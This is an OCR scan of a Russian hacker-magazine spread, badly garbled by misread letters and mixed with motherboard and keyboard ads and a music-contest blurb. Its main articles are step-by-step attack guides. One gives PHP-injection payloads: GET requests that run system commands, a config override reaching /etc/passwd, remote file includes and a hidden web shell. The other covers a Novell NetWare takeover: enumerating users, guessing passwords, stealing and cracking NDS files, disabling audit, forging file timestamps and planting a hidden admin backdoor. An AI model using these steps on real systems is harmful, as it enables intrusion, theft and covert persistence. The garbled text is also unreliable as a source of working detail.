в том числе всякие зузіет и аналоги с помощью трюка, который 
описан ниже. 



Что еще может быть? 

А может быть еще очень и очень много полезных вещей. Давай по 
пунктам: 

1. Использовать массив данных без предварительного объявле- 
ния. Например: 



Тог($і=0;$і< 1 0;$і++) 



@$а[$і]=$з[$і]; 



//Копируем 10 первых 
//элементов массива $з 
//в а, без определения $а 



Іог($і=0;$і<соип1($а);$і++) 



еѵаІ(‘$у[‘.$а[$і].’]=’.$і); 
//какое-то извращение 
//криворукого программера 



А 



. СКОРОСТЬ 

* * - * 



БЕЗ ОГРАНИЧЕНИИ 





Совершенная бесшумность 



ОиаІ СогеСеІІ обладает возможностью точного управления 
цепями питания для эффективного снижения рабочей 
температуры элементов системы в зависимости от ее 
загрузки, а благодаря интеллектуальному механизму мони- 
торинга и управления скоростью вращения вентиляторов 
систем охлаждения, достигается общее снижение шума, 
производимого системой. 



Кристальная чистота звука 



КЭМ Шга-2Р 



Чипсет: пѴЮІА пРогсе 570 



Память: 4 слота 6ІММ ОиаІ СбаппеІ ООП2-800 
максимально до 8Гб 



Слоты расширения: 

- 1 слот РСІ-Е х16 

- 2 слота РСІ-Е хі 

- 2 слота РСІ 2.3 



Поддержка процессоров: Сокет АМ2 АІѴЮ Аііііоп 
64/Х2/ЕХ 



Дисковая подсистема: 

- 6 каналов 5АТА2 ЗГбит/сек 

- Технология МесПаЗЫеІсІ ЗІогаде 

Звук: 8-ми канальный высокой четкости (формат 7.1) 



Сеть: Два контроллера СідаЬіІ ЕІІтегпеІ 



Фирменная технология ОиаІ СогеСеІІ 



КЭЫ 511 РІаііпит 



Благодаря улучшенному дизайну цепей питания и компонов- 
ки элементов системной платы, ОиаІ СогеСеІІ существенно 
снижает интерференцию электрических сигналов, обеспечи- 
вая их более качественную передачу, и увеличивает произво- 
дительность и стабильность системы в целом. 



ОиаІ СогеСеІІ обеспечивает лучшее качество звуково- 



с поддержкой О.О.Т. Ехргезз 



Поддержка процессоров: Сокет АМ2 АІѴЮ АіМоп 64/Х2/ЕХ 



Чипсет: пѴІЙІА пРогсе 570 5І_І 




Память: 4 слота В\Ш ОиаІ СИаппеІ ООВ2-800 
максимально до 8Гб 

Слоты расширения: 

- 2 слота РСІ-Е хіб (8х + 8х для режима ЗІ_І) 

- 2 слота РСІ-Е хі 

- 2 слота РСІ 2.3 
Дисковая подсистема: 

- 6 каналов 5АТА2 ЗГбит/сек 

- Технология МесПаЗЫеІсІ ЗІогаде 

Звук: 8-ми канальный высокой четкости (формат 7.1) 
Сеть: Два контроллера СідаЫІ ЕІІіегпеІ 

Фирменная технология ОиаІ СогеСеІІ 
с поддержкой О.О.Т. Ехргезз 
Дизайн «Бесшумного охлаждения 



ѴАУАУД і іиіштіі} А 
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взлом 





Вместо функции іпсіисіе в скрипте могут фигурировать схожие 
іпсІисІе_опсе, гециіге, гециіге_опсе, которые также могут быть 
задействованы в описанных уязвимостях. 



Подразумевается, что $з — «безопасный» массив, то есть ни- 
какой опасности для конструкции он не представляет. Однако 
посмотрим, что будет, если на сервере включен гедізІег_дІоЬаІз. 
Если послать такой (ЗЕТ-запрос: ІіПр://ІіозІ/зсгір1.рІір?а[10] = 1;зу 
зІет(‘Із’);//, то мы получим листинг файлов директории, в которой 
находится зсгірІ.рИр. Это происходит потому, что определение 
1 1-го (в массивах элементы считаются от нулевого элемента) ни- 
какие противоречитопределениям скрипта. Никто не претендует 
на место 11-го элемента массива, поэтому мы получим доступ к 
якобы уже определенному массиву. Чтобы избавиться от данной 
ошибки, надо предварительно написать определение $а=аггау(). 
При передаче элемента массива через (ЗЕТ-, РОЗТ-запросы или 
куки ключ не ставится в кавычки. Таким образом, в запросе сле- 
дует писать аггау[патеіпсІех], а не аггау[‘патеіпсІех’]. Эту ошиб- 
ку часто можно встретить при работе с модульными файлами. 
То есть, рассчитывая на определение массива в другом модуле 
или ядре, конкретный модуль является уязвимым, и иногда, при 
особым образом сформированном запросе, непосредственно к 
модулю, можно вызвать нежелательное обращение к элементам 
массива. Это частный случай, а вообще, движки с модулями, до- 
ступными для прямого обращения и работающие при таком обра- 
щении в обычном режиме — очень лакомый кусочек. 

2. Можно каким-либо образом подвергать опасности уже опреде- 
ленные переменные переопределения. Рассмотрим конкретную 
ошибку РНР-инъекции в ѵсагсі. 

Конфигурационные данные движка определены в специальном 
файле-конфиге, который инклудится в каждый самостоятельный 
РНР-файл (файл, к которому предполагается непосредственное 
обращение пользователя) в самом начале этого скрипта. Все кон- 
фигурационные данные представляют собой элементы ассоциа- 
тивного массива $сТд. После чего идет код, который осуществляет 
замену всех параметров, переданных через (ЗЕТ, в одноименные 
переменные внутри скрипта. 



іі (!етріу($_(ЗЕТ)) 



Іогеасіп ($_(ЗЕТ аз $ітр_ѵагпате => $1тр_ѵаІие) 



$$1тр_ѵагпате = $1тр_ѵаІие; 




Обрати внимание, что это происходит после того, как были опре- 
делены конфигурационные данные! Это означает только одно: мы 
можем переопределить все конфигурационные данные, сформи- 
ровав запрос примерно такого вида: 



іпсІех.рІір?с1д[Іпоз1:пате]=Ьігіс2.а1:&с1д[сІЬизег]=ЬІ007ѵта&с1д 
[сІЬпате]=ЬЮ07ѵтаІезІ&с{д[зкіп]=тузкіп&с{д[сІЬразз]=іѵкх2СІ& 
сід [Іапд] ./. ./. ./. ./. ./. ./еіс/раззѵѵсі 

С помощью представленной уязвимости можно инклудить произ- 
вольный файл, загружать на сервер свои файлы и т.д. Уязвимость 
нашел ЗНапКаВ. 

3. Можно не думать о разнице между «“» и «V Выше я упоминал 
про взлом хацкерского ресурса. Осуществлен он был через сле- 
дующий фрагмент скрипта: 



еѵаІ(“\$$гедіз1ег_роІІ_ѵагз[$і] = \””.Ігіт($НТТР_(ЗЕТ_ѴАВ5[$гедіз1:ег_роІІ_ 
ѵагз[$і]]).”\” : ”) ■ 



Где в качестве $НТТР_(ЗЕТ_ѴАВЗ[$гедізІег_роІІ_ѵагз[$і]] мож- 
но было подставить параметр ісі. Если бы в скрипте, например, 
была бы объявлена переменная, содержащая пароль к БД, а 
значение этой самой $$гедізІег_роІІ_ѵагз[$і] выводилось бы где- 
то в зІбоиГе, мы бы могли передать в ісі строку ЗсІЬраззѵѵсІ (пере- 



менная, содержащая пароль) и получили бы пароль от БД. 

Но это еще полбеды. Дело в том, что разработчики позаботи- 
лись о том, чтобы мы могли вызывать произвольную функцию 
прямо из строки ную кавычку). Делается это так: {${ІипсІіоп()}|. 
Г деІипсІіоп() — обращение кпроизвольной функции. Смотри, если 
передать нашему скрипту строку {${зузІет([СОММАІ\Ю])}}, мы по- 
лучим веб-шелл. 

РНР-іп|ес(іоп 2 ѵѵеЬ-зИеІІ 

Поскольку обнаруженные баги на сайтах обычно долго не живут, 
то держать в виде веб-шелла саму уязвимость не только неудобно, 
но и ненадежно. Здесь я опишу, как нам залить веб-шелл на сайт 
и укромно его припрятать. Прежде всего у нас должна быть папка 
с правами на запись. Чтобы получить листинг файлов и папок с 
правами, рекурсивно воспользуйтесь командой: Із -Ріа. Для 
ѴѴіпбоѵѵз: сИг/О. 

Если доступ к стсі из скрипта запрещен — на диске ты всегда смо- 
жешь найти все необходимое, а именно: скрипт, который выводит 
рекурсивно все файлы и папки. Напротив тех, на которые разре- 
шена запись, ставится 1 (используйте іпсІисІе(‘ИДр://зтіИ.пагосІ. 
ги/зсгірІ.рНр’) в рИр-инъекции). 

Вот теперь, когда мы с тобой нашли директорию с правами на за- 
пись, надо залить сам скрипт. 

Для того чтобы узнать, какая качалка стоит на сервере, выполняем 
следующую команду: 



ѵѵГіісГі де1;ѵѵЬісІп \л/деІ;ѵѵГіісГі Іупх;ѵѵЬісІп сигІ;ѵѵЬісГі 1е1сИ;ѵѵІпісІп Ііпкз 



В ответ будут выведены пути к соответствующим утилитам. Поль- 
зоваться каждой из них очень просто. Теперь нам надо спрятать 
наш скрипт, чтобы админ, пропатчив приложение, не заметил его. 
Для этого нужно придумать шеллу неприметное название. Но если 
он, например, находится в папке для аватар, то как его ни пере- 
именовывай, файл с расширением рбр — белая ворона среди ги- 
фок и джипегов. Но мы можем загрузить в папку .Иіассезз-файл и 
указать, что файлы с расширением діТ интерпретируются как РНР- 
скрипт. Строку «АсІсІТуре аррІісаІіоп/х-НіПрсІ-рНір діТ» можнозанести 
в .Иіассезз с помощью есИо из стсі или простейшим скриптом. Од- 
нако если ты знаком с рИр, то знаешь, что в случае установленного 
на сервере за!е_тосІе мы не можем использовать функции выпол- 
нения системных команд и программ. К счастью, за!е_тосІе — это 
директива РНР, так что если РНР-инъекцию удастся найти, можно 
будетхимичить с РегГом, на который ограничения за!е_тосІе никак 
не распространяются. На диске есть пример веб-шелла на перле. 

Ко всему вышесказанному 

Не забывай, что параметры могут быть переданы скрипту четырьмя 
способами: СЕТ, РОЗТ, СООКІЕ, ЗЕЗЗЮІМ. Первыетри из нихполь- 
зователь формирует сам. Информация сессии хранится на серве- 
ре и не можетбыть модифицирована пользователем, вто время как 
куки ты можешь спокойно изменять. 

Прелесть тут в том, что многие ѵѵеЬ-программисты почему-то от- 
носятся к кукисам, как к чему-то такому, что проверять надо менее 
строго, чем РОЗТ и (ЗЕТ (ну вроде того, что последние два мож- 
но задавать прямо в строке браузера или в формочке на сайте, а 
куки еще и «хрен знает, как ты подделаешь»), поэтому очень часто 
уязвимости можно встретить именно в параметрах, передаваемых 
куками. Это могут быть какХЗЗ, ЗОБ-іпіесІіоп, таки РНР-іпіесІіоп. Я 
рекомендую для поиска уязвимостей РНР-іпіесІіоп писать програм- 
мку, которая бы сканировала все файлы движка и вынимала из них 
всяческие подозрительные вещи, например все то, что описано в 
статье. Все еѵаі, строки регулярных выражений с модификатором 
«е», не говоря уже о іпсіисіе, гециіге. Анализируется подобный мате- 
риал потом достаточно быстро и просто. Пример такой программки 
опять же лежит на диске. На этой веселой ноте я ухожу за кулисы. А 
ты даже и не думай все это проделывать на практике: закон бдитіз: 
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Товар сертифицирован 



тонкая — . 

влагонепроницаемая 

клавиатура с антибактериальным покрытием 





ЗІітЗіаг 310 




Корпус клавиатуры пыле- 




и влагонепроницаемым. 
Если на клавиатуру попали напитки 
с содержанием сахара, 
ее достаточно просто прополоскать 
в прохладной воде. 



Основной модуль клавиатуры 
имеет антибактериальное покрытие, 
содержащее серебро и 
защищающее от геморрагических 
и стафилококковых бактерий. 



Кроме стандартных клавиш, на ЗІітЗіаг 310 присутствует 14 клавиш быстрого доступа 
к мультимедийным функциям, интернет навигации, отправке сообщений, 
приложениям ОИісе. 

Клавиши ЗІітЗіаг 310 обеспечивают лучшие тактильные ощущения. 

Тонкий и эргономичный корпус ЗІітЗіаг 310 выполнен в соответствии с последними 
модными тенденциями. 



Сепіиз 



г? 



ѵ\ллл/ѵ.депіиз.ги 






НЕТВАРЬ 

ПОД УДАРОМ 

ПОЛУЧАЕМ ПРАВА АДМИНИСТРАТОРА НА СЕРВЕРЕ ЫОѴЕІ.І. 

«НЕУДАЕТСЯ ПЕРЕМЕСТИТЬ ФАЙЛ. НЕТ ДОСТУПА» -ЗНАКОМОЕ СООБЩЕНИЕ, 

НЕ ПРАВДА ЛИ? ЛИЧНО Я ПРИ ВИДЕ ПОДОБНЫХ МЕССАГ ЧАЩЕ ВСЕГО ОЩУЩАЮ 
ОГРАНИЧЕНИЕ В ПРАВАХ, ЗАМКНУТОСТЬ И НЕПОЛНОЦЕННОСТЬ. УВЕРЕН, ЧТО 
И ТЕБЕ НЕ РАЗ ПРИХОДИЛОСЬ ИСПЫТЫВАТЬ ПОДОБНЫЕ ЧУВСТВА. ІЧОѴЕЫ 
ІЧЕТѴѴАВЕ — ОДНА ИЗ ТЕХ СЕТЕВЫХ СИСТЕМ , КОТОРАЯ ЗАСТАВЛЯЕТ ЧУВСТВО- 
ВАТЬ СЕБЯ УЩЕРБНЫМ. БЫТЬ ОГРАНИЧЕННЫМ, ПОНЯТНОЕ ДЕЛО, НИКТО НЕ 
ХОЧЕТ, А ТЕМ БОЛЕЕ МЫ С ТОБОЙ. В ЭТОЙ СТАТЬЕ Я РАССКАЖУ, КАК ПОБОРОТЬ 
ЭТИ НЕГАТИВНЫЕ ЧУВСТВА И ПОДЧИНИТЬ ІЧОѴЕЫ ЫЕТѴѴАРЕ (ВЕРСИИ 4.Х) СВО- 
ЕЙ ВОЛЕ. ПРИСТУПИМ! 



Источник болезни 

Компания ІЧоѵеІІ утверждает, что ЫеіѴѴаге — не- 
приступный бастион, но так ли это? Тут мно- 
гое зависит от админа: если он потрудится 
настроить все должным образом, то сломать 
систему окажется практически невозможно. 
Практически — это ключевое слово! Вот смот- 
ри: к примеру, есть такая недоработка. В кон- 
фигурации по умолчанию любой пользователь 
может без аутентификации просматривать 



дерево службы каталога ІЧоѵеІІ (N05, ІЧоѵеІІ 
ОігесІогуЗегѵісез). Более того, продукты ІЧоѵеІІ 
не требуют от пользователей ввода пароля. 
Такие системы становятся легкой добычей 
для хакера. Рассмотрим одну из таких систем 
в «разрезе». 

Подключение к ЫеІѴѴаге 

Сначала анонимно подключимся к серверу 
ІЧоѵеІІ. Для этого придется разобраться, как 



происходит процесс регистрации Нетвари. 
Компания [ЧоѵеІІ разработала регистрацию на 
сервере с учетом того, что перед аутентифи- 
кацией пользователь должен «подключиться» 
к системе. Подключение и регистрация не 
являются взаимосвязанными процессами, по- 
этому, если ты и не смог зарегистрироваться 
в системе, подключение сохраняется. Следо- 
вательно, для подключения к системе не нужно 
знать имя пользователя и пароль. Как только 
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удалось подключиться к серверу, сразу откры- 
вается множество путей к системе. Удобнее 
всего использовать утилиту пзіізі. Она рабо- 
тает из командной строки и предоставляет 
взломщику много полезной информации. В 
частности, показывает информацию о серве- 
рах и деревьях. Ее достоинством, в отличие от 
утилит подобного рода, является то, что она 
выводит полный адрес сервера. 

Сбор компромата 

Когда есть подключение, но нет аутентифика- 
ции, можно получить гораздо больше инфор- 
мации, чем требуется законному пользова- 
телю. В этом нам помогут такие утилиты, как 
изегіпіо, изегбитр, Ьіпсіегу, піізі и сх. Запустив 
изегіпіо (ЫеіѴѴаге ІІзег Іпіогтаііоп Ызііпд), ты не- 
медленно увидишь дамп всех пользователей в 
базе данных связывания указанного сервера. 
Утилита изегіпіо разрешает проводить поиск 
по имени пользователя при указании его в 
качестве параметра. Таким образом, ты легко 
можешь заполучить все имена пользователей 
системы. Но этого, естественно, не достаточ- 
но. Утилита изегсіитр поможет тебе дополни- 
тельно узнать полные имена пользователей. 
Зная их, ты можешь прибегнуть к «социальной 
инженерии», каким образом — решать тебе. 
Конечно, важно знать имена пользователей, 
но хорошо бы еще и знать, кто в какую группу 
входит, напримеру в группу администраторов. 
Нет проблем: здесь поможет утилита Ьіпсіегу. 
Она показывает практически все объекты свя- 
зывания. Кроме того, утилита Ьіпсіегу позволя- 
ет запросить данные об определенном поль- 
зователе или группе. Например, если ввести 
Ьіпсіегу абтіпз, то узнаешь о членах группы 
Абтіпз. Параметр /В выводит по одной строке 
для каждого объекта (полезно при просмотре 
большого числа объектов дерева). Утилита 
піізі, которая поставляется вместе с ІМоѵеІІ и 
доступна всем пользователям в директории 
РиЫіс, выводит дополнительные сведения, 
включая имена пользователей, группы, сер- 
веры, запросы и тома. Кратко рассмотрим ис- 
пользуемые параметры при работе с ней: 
піізі изег /б — выводит в стандартном формате 
сведения о пользователях сервера, 
піізі дгоирз /б — показывает определенные на 
сервере группы и входящих в них членов, 
піізі зегѵег /б — показывает все работающие 
серверы. 

піізі /оі=* /буп /б — выводит все сведения обо 
всех объектах. 

Утилита піізі полезна для получения подробных 
сведений о свойствах объектов (заголовок, 
фамилия, номер телефона и тому подобное). 
Уверен, что к этому моменту удалось собрать 
много полезной информации. Самое главное, 
чтоу тебя есть имена пользователей. Осталось 
только подобрать пароли. 

Напролом! 

Если ты внимательно читал статью, то пом- 
нишь, что ІМеіѴѴаге не требует пароля при со- 
здании учетной записи. В результате многие 




записи создаются с пустым паролем и никогда 
не используются в работе — это широко откры- 
тая дверь в большинство серверов ІЧоѵеІІ. Не 
секрет, что, не желая усложнять себе жизнь, 
пользователи выбирают простоту в ущерб бе- 
зопасности и применяют легко запоминающи- 
еся пароли. Воспользуемся утилитой сЬкпиІІ 
для подбора простых паролей на сервере 
ЫеіѴѴаге, но сначала рассмотрим используе- 
мые параметры: 

сИкпиІІ [-р] [-п] [-ѵ] [ѵѵогсііізі . . . ] 

-р - проверить на пароль имя пользователя; 

-п - не проверять на нулевые (N1X1) пароли; 

-ѵ - вывести дополнительные результаты. 
Кроме того, выполняется проверка по словам, 
указанным в командной строке. 

Интересно, что проверка на пустой (неуста- 
новленный) пароль не приводит к регистрации 
неудачной попытки ввода пароля, как это дела- 
ется при вводе какого-нибудь значения. Наде- 
юсь, тебе удалось подобрать простой пароль 
к какой-нибудь учетной записи, так что можно 
приступать к получению администраторских 
прав. 

Собираем важные сведения 

Узнав с помощью утилиты сИкпиІІ имя и пароль 
пользователя, следует попробовать зарегист- 
рироваться в сети, применив программу Іодіп. 
ехе системы 005 или С1іепі32. Затем можно 
открыть доступ к еще большему объему ин- 
формации с помощью утилиты ЫОЗзпоор. 
Она позволяет получить в графическом виде 
описание всех объектов и их свойства, в том 
числе сведения о Іазі Іодіп ііте (время послед- 
ней регистрации) и ециіѵаіепііо те (эквивален- 
тность в правах) — главный приз для любого 
атакующего. 

Получение права АРМІЫ 

Твоим следующим шагом является получение 
права администратора. Для этого есть два ос- 
новных способа: 

1. Грабеж (ріііаде) сервера (традиционный 
метод). 

2 . Атака мистификации ЫСР. 

Рассмотрим их детальнее. Первый способ — это 
простой поиск файлов с паролями бестолко- 
вых юзеров, хранящих их в текстовых доку- 
ментах. Думаю, ты сам знаешь, что результат 
подобных действий гораздо успешнее, чем ка- 
жется на первый взгляд. На этом этапе нужно 
внимательно исследовать все доступные фай- 
лы, чтобы найти в них подсказки. Возможно, 
обнаружится даже пароль администратора. 
Отобрази корень тома ЗУЗ командой МАР: 




Представление содержимого сервера в 
виде деревьев 

ЗѴЗ:НОМЕ 

5У5:1_Оа1Ы 

ЗУЗ:МАІЕ 

8У5:РІІВиС 

Вполне возможно, что тебе повезет, и ты най- 
дешь нужную инфу. Еслижефортунаповерну- 
лась к лесу передом, а к тебя задом, то можно 
попробовать тулзу Ыѵѵрсгаск. Она проводит 
атаку по словарю для указанного имени поль- 
зователя. Здесь нужна особая осторожность, 
так как банальный брут может включить защи- 
ту от вторжения, и сервер ИеіѴѴаге перестанет 
принимать от проги запросы на регистрацию 
в системе. 

Если не удалось получить права администра- 
тора ни одним из предложенных выше мето- 
дов атаки, то стоит воспользоваться утилитой 
атаки мистификации Рапбога, разработанной 
в Ыотаб МоЬіІе ВезеагсН Сепіег (ЫМНС). Она 
предоставляет пользовательское право, эк- 
вивалентное Абтіп. Для ее работы необходи- 
мо обеспечить следующие условия: 

1. Должен работать сетевой адаптер с па- 
кетным драйвером (не все сетевые адаптеры 
имеют такой драйвер). О наличии пакетного 
драйвера нужно узнать у производителя. Ком- 
пании Ыеідеаг, О-Ыпк и ЗСот поставляют его 
вместе со своими устройствами. Пакетный 
драйвер должен перехватывать прерывания 
0x60. 

2 . Необходимо загрузить поддержку 003 
ОРМІ, иначе Рапбога будет бесполезна. Нуж- 
ные файлы можно найти на ѵѵеЬ-странице ути- 
литы Рапбога. 

3. В дереве нужно найти контейнер, содержа- 
щий пользователя Абтіп (или эквивалентного 
администратору пользователя) и пользовате- 
ля с известным атакующему паролем. 

Действия после получения права 



АйМШ 



тар п зесгеі/зуз:\ 

Исследуй все доступные каталоги тома, при- 
чем наибольшее внимание удели каталогам: 

ЗѴЗ:ЗѴ5ТЕМ 
ЗУЗ: ЕТС 



Если все ранее проделанное дало желаемый 
результат, то можешь облегченно вздохнуть — 
самая сложная работа позади. У тебя есть адми- 
нистративный доступ ксерверу и большей части 
дерева. Далее нужно получить доступ к консоли 
сервера (гсопзоіе) и захватить файлы N03. 

По умолчанию пароль утилиты гсопзоіе хра- 
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І\ІОѴЕІ_І_ СІ_ІЕІ\ІТ32 еор ѴѴішоѵѵз 

нится открытым текстом в файле аіЛоехес.псЕ 
Чтобы его узнать, проделаем следующее: 

1 . Открываем файл 5Ѵ5:\ЗѴ5ТЕМ\аіЛоехес.псЕ 

2 . Находим строку ІоасІ гетоіе. Следующим 
параметром является пароль, причем записан- 
ный обычным текстом, к примеру: 

ІоасІ гетоіе туразз 

3. Если пароля не видно, и в строке записа- 
но «-Е», следовательно, админ позаботился 
о шифровании пароля удаленного доступа, к 
примеру: 



ІоасІ гетоіе -Е 158470С41 1 176130953900 

Нас с тобой это, конечно, не остановит. Хакер 
йгеатег уже разгадал алгоритм шифрования 
и написал код на дяде пасе для дешифрации 
удаленного пароля. 

Захват файлов N0$ 

После получения пароля утилиты гсопзоіе на- 
чинается заключительный этап взлома — до- 
ступ к файлам N03. Компания МоѵеІІ хранит 
файлы N03 вскрытом каталоге _пе1ѵѵаге тома 
ЗУЗ. Доступ к каталогу возможен только че- 
рез консоль (утилиту гсопзоіе). Попробуем 
скопировать эти файлы на локальный ком- 
пьютер. 

Пакет ІЧеіВазіс Зойѵѵаге Оеѵеіортепі Кіі (ЗйК) 
позволяет преобразовать сценарий ИеШазіс 
в загружаемый модуль ЫоѵеІІ (І\ІІ_М) для ис- 
пользования на ѵѵеЬ-сервере ІЧеІѴѴаге. Ока- 
зывается, конечный компонент, пеШазіс.пІт 
(5Ѵ5:5ѴЗТЕМ), обладает уникальными воз- 
можностями: он обеспечивает просмотр все- 
го тома, включая скрытый каталог _пе!ѵѵаге, 
из командной строки. ІЧеіВазіс по умолчанию 
устанавливается во всех системах Ыеіѵѵаге 

4.x, поэтому является наиболее распростра- 
ненным средством доступа к файлам N03. Кро- 
ме того, только ЫеІВазіс позволяет «стащить» 
данные из N03 без закрытия службы каталога 
(Оігесіогу Зегѵісез). Для того чтобы лучше по- 
нять суть этого метода, рассмотрим пример: 

1 . Получаем доступ к гсопзоіе командой 5Ѵ5:\ 
Р11В1_1С\гсопзо1е; 

2 . ипіоаб сопіод (удаляем регистратор консо- 
ли и все записи об исполняемых командах); 

3. Іоаб пеШазіс.пІт; 

4 . зНеІІ; 

5 . сб \_пе1ѵѵаге (это срытый системный ката- 
лог, видимый только в системной консоли); 

6 . тб\Іодіп\пбз; 

7 . сору Ыоск.пбз\Іодіп\пбз\Ыоск.пбз; 

8 . сору епІгу.пбз\Іодіп\пбз\епІгу.пбз; 

9 . сору рагШо.пбзХІодіпѴібзХрагШіо.пбз; 

1 0. сору ѵаІие.пбз\Іодіп\пбз\ѵаІие.пбз; 

1 1 . ехіі (выходим из оболочки); 

12. ипіоаб пеі Ьазіс; 



13. ІоасІ сопіод (возврат к первоначальному 
статусу управления); 

14 . Копируем файлы *.І\Ю5 на локальный 
компьютер; 

1 6. Можно приступать к их взлому. 

Взлом файлов N0$ 

Если тебе удалось скопировать файлы 
N03, можешь собой гордиться: ты выиграл 
настоящую битву. Дело осталось за малым 
— взломать эти файлы. Для этого воспользу- 
емся бесплатной программой ІМР от ЗНабе. 
А еще тебе понадобится хороший словарь 
для перебора. Прога реализует как взлом по 
словарю, так и атаку «грубой силой», а также 
довольно шустро работает в графическом 
режиме. Из четырех файлов N03 (получен- 
ныхс помощью ІМеіВазіс: Ыоск.пбз, епігу.пбз, 
раПШо.пбз и ѵаіие.пбз) взламывать придется 
только один — рагіііо.пбз. Открываем окно 
ІМР и загружаем этот файл с диска. Выбира- 
ем режим Оісііопагу или ВпЛе Еогсе и начи- 
наем взлом. 

Уборка 

На этом этапе необходимо замести следы 
своего пребывания в системе. Нужно отклю- 
чить аудит, модифицировать данные в фай- 
лах и вылечить файл регистрации. 

а. Отключение аудита. 

Лишние улики никому не нужны, поэтому не- 
обходимо отключить аудит службы каталогов 
и серверов. Для этого нужно выполнить не- 
сколько последовательных действий: 

1 . Запускаем 5Ѵ5:РІ)ВІ_ІС\аибіІсоп; 

2 . Выбираем АибіІ Оігесіогу Зегѵісез (Аудит 
службы каталога); 

3. Выделяем нужный контейнер (с которым 
предстоит работать) и жмем ЕЮ; 

4 . Выбираем АибШпд СопЛдигаІіоп (Конфи- 
гурация аудита); 

5 . Устанавливаем ОізаЫе Сопіаіпег АибШпд 
(Отключить аудит контейнера); 

б. Теперь можно добавить контейнеры и 
пользователей в подготовленный контейнер, 



но админ системы уже ничего не узнает о 
действиях с ними :). 

Ь. Изменение журнала регистрации. 

При изменении важных файлов, например 
аиШехес.пс^ или пеІіпШ.сф, ни в коем случае 
нельзя попасться администратору. Для это- 
го можно использовать ЗѴ5:РІ)ВІ_ІСѴіІег для 
возврата параметров в исходное состояние. 
Утилита ТМег выводит в режиме 003 меню для 
выбора файлов и изменения их атрибутов. 
Пример использования утилиты: 

1 . Запускаем ТМег из каталога 5Ѵ5:РІІВІ_ІС; 

2 . Выбираем Мападе Еііез Апб Оігесіогіез (Уп- 
равление файлами и каталогами); 

3. Находим каталоге нужными файлами; 

4 . Выделяем эти файлы; 

5 . Выполняем Ѵіеѵѵ/ЗеТ РІІе Іпіогтаііоп (Про- 
смотр/установка файловой информации); 

6 . Изменяем І_азІ Ассеззеб Оаіе (Дата послед- 
него доступа) и І_азІ МобіЛеб Оаіе (Дата пос- 
леднего изменения) 

Скрытый доступ 

Используя скрытый организационный эле- 
мент (016) с эквивалентными администратору 
пользовательскими правами, можно надежно 
спрятать нужный объект. Непонятно, да? Рас- 
смотрим пример: 

1. Регистрируемся в дереве с правом Абтіп 
или эквивалентным ему правом доступа; 

2 . Запускаем ЫеіѴѴаге АбтіпізігаШг; 

3. Создаем контейнер в глубине дерева, щел- 
каем правой кнопкой мыши.насуществующем 
организационном элементе, а затем создаем 
новый ОЕІ командой Сгеаіе, с параметром 
ОгдапігаІіопаІ ІІпіі; 

4 . В полученном контейнере создаем пользо- 
вателя. Щелкаем на новом контейнере правой 
кнопкой мыши, выбираем Сгеаіе и выполняем 
ІІзег; 

5 . Присваиваем пользователю полное право 
Тгизіее НідНІз на его собственные объекты. 
Щелкаем правой кнопкой мыши на новом 
пользователе и выполняем Т гизіеез ТМз 
ОЬіесІ (Доверитель этого объекта). Проверя- 
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Все описанные в статье утилиты лежат на 
нашем наикрутейшем диске! 



3 

Данная информация предоставлена 
только для ознакомления и организации 
правильной защиты в сетевых системах. 
За применение материала в незаконных 
целях автор и редакция ответственности 
не несут. 




Собираем инфу с помощью ІМбззпоор 




Меняем параметры аудита 



ем, что пользователь стал явным доверителем; 

6 . Присваиваем пользователю полное право 
Тгизіее НідНІз на новый контейнер. Щелкаем 
правой кнопкой мыши на этом контейнере и 
выполняем Тгизіее ОГГЫз Офесі. Проверяем, 
что пользователь стал явным доверителем 
нового контейнера. Для этого устанавливаем 
все имеющиеся свойства. 

7 . Изменяем право пользователя, чтобы 
сделать его эквивалентным Асітіп. Щелкаем 
на пользователе правой кнопкой мыши, вы- 
бираем Оеіаііз, указываем вкладку Зесиіѣу 
Ециіѵаіепі То, щелкаем на Абб и устанавлива- 
ем Абтіп; 

8 . Изменяем ІпИегііеб ВідНІ Ріііег (Фильтр 
наследования прав) контейнера: отменяем 
атрибуты Вгоѵѵзе (Просмотр) и Зирегѵізог (Су- 
первизор) 

9 . Воспользовавшись полученным черным хо- 
дом, зарегистрируйся в системе. Помни, что 
никто не сможет увидеть новый контейнер де- 
рева. Следовательно, нужно вручную ввести 
контекст во время регистрации. 

Злоключение 

Как ты уже понял, получить админские права и 
пароли пользователей в ЫоѵеІІ Ыеіѵѵаге не так- 
то просто. Кроме знаний, времени и желания, 
нужна еще и удача. Зато, с другой стороны, ты 



получаешь контроль над юзерами и даже над 
админом. А для этого, поверь, стоит приложить 
усилия. Напоследок скажу известную фра- 
зу: «Все, что создано человеком, может быть 
взломано». ІМоѵеІІ ИеЕл/аге не является исклю- 
чением. =н= 
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Сайт проекта Рапбога: 
ѵѵѵѵѵѵ.птгс.ога/ргоіесі/рапбога/іпбех.іііті 
Большое количество программ для взлома 
ІМоѵеІІ [Меіѵѵаге: 

ИДр://апІісобе.ап1іопІіпе.сот/боѵѵпІоаб. 

рИр?бса1еаогѵ=поѵеІІ&зогШѵ=бІіІепате&з 

оДогбег=РЕЗС&раае= 1 

Сайт проекта ІМР: ѵѵѵѵѵѵ.ѵѵазіеіапбз.деп.пг 
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Пару месяцев назад мы вместе 
с компанией Ргезіідіо объявляли кон- 
курс: нужно было написать свое музыкаль- 
ное произведение и прислать его нам на поч- 
ту. Скажу честно, чего я только не наслушался. 
Больше всего своим позитивом поборола мур- 
маніИ группа Х-Рііез, спевшая песенку об 
«Адском ботане». Настоящая жесть, приятель. 
Можешь заценить на нашем диске. 



Антон (Зоипб-Маз1;ег@Ьк.ги) написал позитивный трак о 
лете. Прикольно сыграл с друзьями на гитарках и бараба- 
нах. В планах положить еще вокал на мелодию. Поздрав- 
ляем! 

0 \ Ужаленный (пеоапІІтгор@гатЫег.ги) написал приколь- 
ную музыку и переложил на нее знаменитую песенку Маль- 
чишника. С одной стороны, плагиат, с другой — получи- 
лось забавно. Музыка позитивная. 

Павел Козлов (ІгіЬак@таіІ . ш) нахреначил весел ый трек в стиле 
тынца-тынца. Почетное третье место. 
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КУДА ТОЛЬКО НЕ НЕСЕТ ДЕВЕЛОПЕРСКОЕ СОЗНАНИЕ В ПОИСКАХ ЗАЩИТЫ ДЛЯ 
СВОЕГО КОДА. НАВЕСНЫЕЗАЩИТЫ, АНТИОТЛАДОЧНЫЕ МЕТОДЫ И ДАЖЕ... ДАЖЕ 
ѴІЗЩАЬ ВАЗІС! ПРЕДСТАВЬ, ПИСАТЬ ПРОГРАММУ НА ѴВ ТОЛЬКО РАДИ ТОГО, ЧТО- 
